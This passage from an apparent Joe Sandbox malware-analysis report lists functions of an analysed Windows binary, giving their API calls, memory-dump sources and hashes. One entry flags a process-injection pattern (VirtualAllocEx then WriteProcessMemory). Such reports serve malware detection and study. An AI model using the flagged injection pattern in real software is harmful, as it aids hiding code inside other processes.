                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 658a831e8231b8fe9ec277e16dbcfc15d3eb29bae609a7a4f122c75e06aec0b2
                                                                • Instruction ID: 1a73ccc5f3e278e69f7928f77a54f04b4ff61f241a9ccba891dd0bd207e65d76
                                                                • Opcode Fuzzy Hash: 658a831e8231b8fe9ec277e16dbcfc15d3eb29bae609a7a4f122c75e06aec0b2
                                                                • Instruction Fuzzy Hash: BC51E230D04A1DE7EB10AF92F8496EDBF34FF48311F524095E18535199CB7A46B5CB1A
                                                                Function 0043CB4C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 137stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,00000001,00000001,00000000,00000000), ref: 0043CB87
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID: 0
                                                                • API String ID: 97706510-4108050209
                                                                • Opcode ID: 38bfafd9b25e7daed97e6aca48eb6b23c67a1a90e5e26b746fde9ad10271d1f1
                                                                • Instruction ID: fd2f8b278a38e6a4af275658ad1f61739299634bdbd29fc41be92767bbc5b4d3
                                                                • Opcode Fuzzy Hash: 38bfafd9b25e7daed97e6aca48eb6b23c67a1a90e5e26b746fde9ad10271d1f1
                                                                • Instruction Fuzzy Hash: FC513DB4A00219EFCB00CF99D9C1A9DBBB0FF0D300F4494A9DA18AB356D374AA50DF65
                                                                Function 0047E42C Relevance: 3.1, APIs: 2, Instructions: 136stringwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpynW.KERNEL32(00000000,00000000,00000000,?,00462F85,00000000,00000000), ref: 0047E485
                                                                • MessageBoxA.USER32(00000000,00668116,0066810F,00000010), ref: 0047E5E7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Messagelstrcpyn
                                                                • String ID:
                                                                • API String ID: 1775699937-0
                                                                • Opcode ID: df21aab278cbb04d27fa907b7f97a10fbd2f116d6b2d1dc1ee9d6c6ce37535e0
                                                                • Instruction ID: 16b1391e8299dd53bd2d7d5a0ebf85ee054179f9537e2288ec8b5f5bf016012f
                                                                • Opcode Fuzzy Hash: df21aab278cbb04d27fa907b7f97a10fbd2f116d6b2d1dc1ee9d6c6ce37535e0
                                                                • Instruction Fuzzy Hash: EB41ECB0B40305BBEB20AF62DC1AFAA766FE718704F00556BF508A62E1E6794950CB19
                                                                Function 004C2521 Relevance: 3.1, APIs: 2, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C25C5
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C2650
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 63d8c54b79e3a959c80a5a1c9d4527704412f2ce2698a230bc490b9839a25c69
                                                                • Instruction ID: 3c8f1dffbc67cf00041211884099194fbcf96f034a663b02cbdf1a9a1368fbf2
                                                                • Opcode Fuzzy Hash: 63d8c54b79e3a959c80a5a1c9d4527704412f2ce2698a230bc490b9839a25c69
                                                                • Instruction Fuzzy Hash: C4417475E00309BBEB509F91DD46FAF7BB4EB04704F104069F904BA281D7F59A209B99
                                                                Function 0048224C Relevance: 3.1, APIs: 2, Instructions: 80memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00001000,00000040,?,?,?,?,?,00481DB3,00000000), ref: 0048229F
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00481DB3,00000000), ref: 00482318
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 68e11efb9f8c11a305d3b42460e2b38ab8c94b3825901ff79547ebd8a4a6f76b
                                                                • Instruction ID: f41b51e50f2018009a9596385a1107b6df17974292cb9961da07fa1d317706ec
                                                                • Opcode Fuzzy Hash: 68e11efb9f8c11a305d3b42460e2b38ab8c94b3825901ff79547ebd8a4a6f76b
                                                                • Instruction Fuzzy Hash: 17217474E00308BBEB50AF55CD46FAE7774EB04705F00405AFE04BB281E3B99A109F59
                                                                Function 004BA852 Relevance: 3.1, APIs: 2, Instructions: 72stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000001), ref: 004BA88D
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004BA910
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMovelstrlen
                                                                • String ID:
                                                                • API String ID: 456560858-0
                                                                • Opcode ID: 054c4c56d4023e214eedcc387804894c9a03c54a5bfb5671f6e352a52badba1a
                                                                • Instruction ID: 011b154f685295f13d4b9441badd0bc3b1ba36988d1a86af87f99f404607bd26
                                                                • Opcode Fuzzy Hash: 054c4c56d4023e214eedcc387804894c9a03c54a5bfb5671f6e352a52badba1a
                                                                • Instruction Fuzzy Hash: A4215970C0420CEBDF10AF91E84A7EEBF74FB04310F0184A6E5443A295CB794A70DBAA
                                                                Function 00464345 Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,00464250), ref: 0046437A
                                                                • ClientToScreen.USER32(00000000,00000001), ref: 004643CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClientForegroundScreenWindow
                                                                • String ID:
                                                                • API String ID: 543591788-0
                                                                • Opcode ID: e45ee86910abd41bdfc1d89e240fce31dc5b7f7231db41bf2d41583dcf24d8ac
                                                                • Instruction ID: f712510772c54deb58c2a5de55252780982022746ddc894640cc6e36fa27784a
                                                                • Opcode Fuzzy Hash: e45ee86910abd41bdfc1d89e240fce31dc5b7f7231db41bf2d41583dcf24d8ac
                                                                • Instruction Fuzzy Hash: AF2142B5E40308FFDF50EF94D8C6B5DBBB4AB09310F10406AE9086B381E7755A909B5A
                                                                Function 004561B4 Relevance: 3.1, APIs: 2, Instructions: 55threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004561E5
                                                                • GetAncestor.USER32(?,00000003), ref: 00456224
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AncestorProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 2900642742-0
                                                                • Opcode ID: 734380954a241558f5e9034685701545407fb38972f378d96d63588a4d3db877
                                                                • Instruction ID: 148ca08dd35ac246e9853eb7a6e137c316f0a848909d7f0a2886ba8a9dfe5684
                                                                • Opcode Fuzzy Hash: 734380954a241558f5e9034685701545407fb38972f378d96d63588a4d3db877
                                                                • Instruction Fuzzy Hash: 4C117070E04208EFDB10DF40D886B69BBB9FB06312F105066F9086F291E3799A55CF5A
                                                                Function 0046A813 Relevance: 3.0, APIs: 2, Instructions: 43threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TerminateThread.KERNEL32(?,00000000,0046A7FF,00000000,00000000,?), ref: 0046A82E
                                                                • CloseHandle.KERNEL32(?), ref: 0046A86C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleTerminateThread
                                                                • String ID:
                                                                • API String ID: 2476175854-0
                                                                • Opcode ID: 49168673724433fe7236adcc26ab330d660060568315aaa2136e2f3f0f5626d8
                                                                • Instruction ID: f85a4c8148dd4fb7049b348f5d546ae3170ba341ea41641575399b238dcf72c5
                                                                • Opcode Fuzzy Hash: 49168673724433fe7236adcc26ab330d660060568315aaa2136e2f3f0f5626d8
                                                                • Instruction Fuzzy Hash: 8301FB74D44208FBDB00AF50D846BADBB70EB06711F105069E9043B290E3755A61DE9A
                                                                Function 00486718 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %fH$%fH
                                                                • API String ID: 0-3971059563
                                                                • Opcode ID: b51ad9ce1e254bcd12eff2096f35fef624322b2d5f7014a3dc0f0e6214de805b
                                                                • Instruction ID: adbfa37a3cf917f8f48eb8d117ba435ef40bc628261ede4735eddb0fd32e3372
                                                                • Opcode Fuzzy Hash: b51ad9ce1e254bcd12eff2096f35fef624322b2d5f7014a3dc0f0e6214de805b
                                                                • Instruction Fuzzy Hash: B9318A75F00304BBEB50BFA59C86F6E77B8DB04304F14446ABA08A7282E6799E509759
                                                                Function 004BAB25 Relevance: 2.6, APIs: 2, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BABB7
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BAC24
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: d694fe8e1ce43fd5ee800c04b13f6ad295183cc8a9c1adc825c0b8ecd9a4b738
                                                                • Instruction ID: 2057915bf783834a909e29b7e8bfa341c42ec8b2bd963eead032e92b7f87cafd
                                                                • Opcode Fuzzy Hash: d694fe8e1ce43fd5ee800c04b13f6ad295183cc8a9c1adc825c0b8ecd9a4b738
                                                                • Instruction Fuzzy Hash: 00310770D0020DEBDF009F91DC86BAEBB71FB08705F004066E6547A291D77A4A70EB9A
                                                                Function 004C4C21 Relevance: 2.6, APIs: 2, Instructions: 56stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4C5D
                                                                • lstrcmpW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4CB6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 3524194181-0
                                                                • Opcode ID: 97e18850f96655437a34928c7d2a9d311d31ba6d03172602d64ab248539fcac7
                                                                • Instruction ID: 197b9e7e9735eace33b683fda3b3ebfa80cbdcf974b647f2152ea0356185a2d7
                                                                • Opcode Fuzzy Hash: 97e18850f96655437a34928c7d2a9d311d31ba6d03172602d64ab248539fcac7
                                                                • Instruction Fuzzy Hash: 83112A34D40208FBDB506F91DE06BADBB31EF01715F40906AB904391A1D77A4A61AF5A
                                                                Function 004C4D06 Relevance: 2.6, APIs: 2, Instructions: 56stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4D42
                                                                • lstrcmpW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4D9B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 3524194181-0
                                                                • Opcode ID: 904d7cf7ede7f947db5cdd9c14935e915554653ba72e45bd3b40e0933ddf4f98
                                                                • Instruction ID: ca14d7598dd8b3203d88df7484d996b7ca588192da60afbf634b73000eac7a78
                                                                • Opcode Fuzzy Hash: 904d7cf7ede7f947db5cdd9c14935e915554653ba72e45bd3b40e0933ddf4f98
